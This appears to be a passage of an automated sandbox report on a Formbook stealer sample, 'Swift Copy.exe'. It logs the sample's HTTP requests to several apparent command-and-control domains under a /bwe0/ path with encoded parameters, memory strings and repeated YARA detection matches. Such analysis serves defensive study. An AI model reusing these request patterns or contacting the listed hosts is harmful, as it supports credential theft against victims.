61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:30:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mogdento.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 65 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6e 6f 2d 73 76 67 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 
79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 4d 4f 47 44 45 4e 54 4f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 55 53 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 6
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: NETSTAT.EXE, 00000019.00000002.518477134.0000000003996000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9
Source: Swift Copy.exe, ImUIYlbLTIh.exe.0.dr String found in binary or memory: http://philiphanson.org/medius/book/1.0
Source: explorer.exe, 0000000B.00000000.339382801.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.323818744.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.389826737.00000000061ED000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.micr$
Source: Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: NETSTAT.EXE, 00000019.00000002.518373021.00000000036A2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.expectedclosure.one/bwe0/?9rV8zl=z0a7bU3Grk9SZV
Source: NETSTAT.EXE, 00000019.00000002.518409409.000000000379E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB
Source: unknown HTTP traffic detected: POST /bwe0/ HTTP/1.1
  Host: www.expectedclosure.one
  Connection: close
  Content-Length: 412
  Cache-Control: no-cache
  Origin: http://www.expectedclosure.one
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.expectedclosure.one/bwe0/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: unknown DNS traffic detected: queries for: www.blackyaga.xyz
Source: global traffic HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== HTTP/1.1
  Host: www.blackyaga.xyz
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1
  Host: www.expectedclosure.one
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== HTTP/1.1
  Host: www.kinemartigues.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1
  Host: www.epic45.co.uk
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== HTTP/1.1
  Host: www.mogdento.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Source: Yara match File source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Swift Copy.exe PID: 1740, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 5496, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Swift Copy.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
